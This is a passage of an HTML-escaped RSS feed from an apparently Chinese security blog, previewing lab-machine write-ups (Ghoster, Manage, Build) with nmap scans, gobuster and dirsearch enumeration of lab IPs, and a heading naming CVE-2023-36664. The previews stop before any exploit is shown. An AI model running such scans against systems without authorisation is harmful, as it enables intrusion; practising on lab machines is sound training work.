&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;mi&#34;&gt;200&lt;/span&gt;      &lt;span class=&#34;n&#34;&gt;GET&lt;/span&gt;     &lt;span class=&#34;mi&#34;&gt;5094l&lt;/span&gt;    &lt;span class=&#34;mi&#34;&gt;30782&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;w&lt;/span&gt;  &lt;span class=&#34;mi&#34;&gt;2832734&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;c&lt;/span&gt; &lt;span class=&#34;nl&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;c1&#34;&gt;//172.17.0.2/index.png
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;mi&#34;&gt;200&lt;/span&gt;      &lt;span class=&#34;n&#34;&gt;GET&lt;/span&gt;       &lt;span class=&#34;mi&#34;&gt;26l&lt;/span&gt;       &lt;span class=&#34;mi&#34;&gt;51&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;w&lt;/span&gt;      &lt;span class=&#34;mi&#34;&gt;589&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;c&lt;/span&gt; &lt;span class=&#34;nl&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;c1&#34;&gt;//172.17.0.2/
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;err&#34;&gt;####################&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;mi&#34;&gt;17&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;s&lt;/span&gt;   &lt;span class=&#34;mi&#34;&gt;661647&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;mi&#34;&gt;661647&lt;/span&gt;  &lt;span class=&#34;mi&#34;&gt;0&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;s&lt;/span&gt;      &lt;span class=&#34;nl&#34;&gt;found&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;mi&#34;&gt;4&lt;/span&gt;       &lt;span class=&#34;nl&#34;&gt;errors&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;mi&#34;&gt;3422&lt;/span&gt;   
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;err&#34;&gt;####################&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;mi&#34;&gt;16&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;s&lt;/span&gt;   &lt;span class=&#34;mi&#34;&gt;661638&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;mi&#34;&gt;661638&lt;/span&gt;  &lt;span class=&#34;mi&#34;&gt;40447&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;s&lt;/span&gt; &lt;span class=&#34;nl&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;c1&#34;&gt;//172.17.0.2/ 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;err&#34;&gt;####################&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;mi&#34;&gt;0&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;s&lt;/span&gt;    &lt;span class=&#34;mi&#34;&gt;661638&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;mi&#34;&gt;661638&lt;/span&gt;  &lt;span class=&#34;mi&#34;&gt;330819000&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;s&lt;/span&gt; &lt;span class=&#34;nl&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;c1&#34;&gt;//172.17.0.2/notes/ =&amp;gt; Directory listing (add --scan-dir-listings to scan) 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;查看到一个&lt;code&gt;note.txt&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-Ghoster</title>
      <link>https://www.hyhforever.top/posts/2025/05/vulnvm-ghoster/</link>
      <pubDate>Sat, 31 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/vulnvm-ghoster/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Difficulty&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Linux&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/ghoster  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap 192.168.55.65 -sV -A -p-                                                                                                              
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT     STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;protocol 2.0&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; ssh-hostkey: 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;   &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; c5:5f:01:14:c9:d4:fe:8e:9c:01:5f:3a:2c:dd:38:64 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ECDSA&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_  &lt;span class=&#34;m&#34;&gt;256&lt;/span&gt; 63:25:3e:2b:61:4f:21:86:fa:d9:e5:d5:b6:bd:e8:29 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;ED25519&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp   open  http    Apache httpd 2.4.62 &lt;span class=&#34;o&#34;&gt;((&lt;/span&gt;Debian&lt;span class=&#34;o&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: Apache2 Debian Default Page: It works
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Apache/2.4.62 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Debian&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;8081/tcp open  http    Werkzeug httpd 3.1.3 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Python 3.11.2&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: Document Submission Portal
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Werkzeug/3.1.3 Python/3.11.2
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/ghoster  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ gobuster dir -u &lt;span class=&#34;s1&#34;&gt;&amp;#39;http://192.168.55.65/&amp;#39;&lt;/span&gt; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt   -x php                            ⏎
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;===============================================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Gobuster v3.6
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;by OJ Reeves &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;@TheColonial&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;&amp;amp;&lt;/span&gt; Christian Mehlmauer &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;@firefart&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;===============================================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;+&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Url:                     http://192.168.55.65/
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;+&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Method:                  GET
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;+&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Threads:                 &lt;span class=&#34;m&#34;&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;+&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;+&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Negative Status codes:   &lt;span class=&#34;m&#34;&gt;404&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;+&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; User Agent:              gobuster/3.6
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;+&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Extensions:              php
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;+&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Timeout:                 &lt;span class=&#34;nv&#34;&gt;10s&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;===============================================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Starting gobuster in directory enumeration &lt;span class=&#34;nv&#34;&gt;mode&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;===============================================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;/.php                 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Status: 403&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;Size: 278&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;/uploads              &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Status: 301&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;Size: 316&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;--&amp;gt; http://192.168.55.65/uploads/&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;/.php                 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Status: 403&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;Size: 278&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;/server-status        &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Status: 403&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;Size: 278&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Progress: &lt;span class=&#34;m&#34;&gt;441120&lt;/span&gt; / &lt;span class=&#34;m&#34;&gt;441122&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;100.00%&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;===============================================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;nv&#34;&gt;Finished&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;===============================================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;cve-2023-36664&#34;&gt;CVE-2023-36664&lt;/h2&gt;
&lt;p&gt;没有什么可以直接利用的，来到&lt;code&gt;8081&lt;/code&gt;端口&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-Manage</title>
      <link>https://www.hyhforever.top/posts/2025/05/vulnvm-manage/</link>
      <pubDate>Sat, 31 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/vulnvm-manage/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Difficulty&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Linux&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/manage  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap 192.168.55.66 -sV -A -p-
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT    STATE SERVICE     VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;80/tcp  open  http        Apache httpd 2.4.62 &lt;span class=&#34;o&#34;&gt;((&lt;/span&gt;Debian&lt;span class=&#34;o&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-title: Apache2 Debian Default Page: It works
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_http-server-header: Apache/2.4.62 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Debian&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;139/tcp open  netbios-ssn Samba smbd &lt;span class=&#34;m&#34;&gt;4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;445/tcp open  netbios-ssn Samba smbd &lt;span class=&#34;m&#34;&gt;4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;MAC Address: 08:00:27:01:D6:2B &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;PCS Systemtechnik/Oracle VirtualBox virtual NIC&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Device type: general purpose&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;router
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Running: Linux 4.X&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;5.X, MikroTik RouterOS 7.X
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;OS details: Linux 4.15 - 5.19, OpenWrt 21.02 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Linux 5.4&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;, MikroTik RouterOS 7.2 - 7.5 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Linux 5.6.3&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Network Distance: &lt;span class=&#34;m&#34;&gt;1&lt;/span&gt; hop
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/manage  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ dirsearch -u &lt;span class=&#34;s1&#34;&gt;&amp;#39;http://192.168.55.66&amp;#39;&lt;/span&gt;                                                                                                         ⏎
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  _&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;. _ _  _  _  _ _&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt;_    v0.4.3                                                                                                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;o&#34;&gt;||&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; _&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;/_&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;o&#34;&gt;||&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;_&lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;                                                                                                                         
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                                                                                                                                                
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Extensions: php, asp, aspx, jsp, html, htm &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; HTTP method: GET &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; Threads: &lt;span class=&#34;m&#34;&gt;25&lt;/span&gt; &lt;span class=&#34;p&#34;&gt;|&lt;/span&gt; Wordlist size: &lt;span class=&#34;m&#34;&gt;12289&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Target: http://192.168.55.66/
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;23:33:52&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Scanning:                                                                                                                            
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;23:33:53&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   278B - /.php                                             
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;23:33:55&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -   11KB - /admin.php                                        
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;23:34:01&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;200&lt;/span&gt; -   10KB - /index.html                                       
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;23:34:05&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   278B - /server-status/                                   
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;23:34:05&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;m&#34;&gt;403&lt;/span&gt; -   278B - /server-status                                    
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;                                                                             
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Task Completed                                                                                                    
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;好像不存在&lt;code&gt;SQL注入&lt;/code&gt;问题，也无法爆破登录，现在来看看&lt;code&gt;445端口&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulNyx-Build</title>
      <link>https://www.hyhforever.top/posts/2025/05/vulnyx-build/</link>
      <pubDate>Sat, 31 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/vulnyx-build/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Difficulty&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Windows&lt;/td&gt;
          &lt;td&gt;Low&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
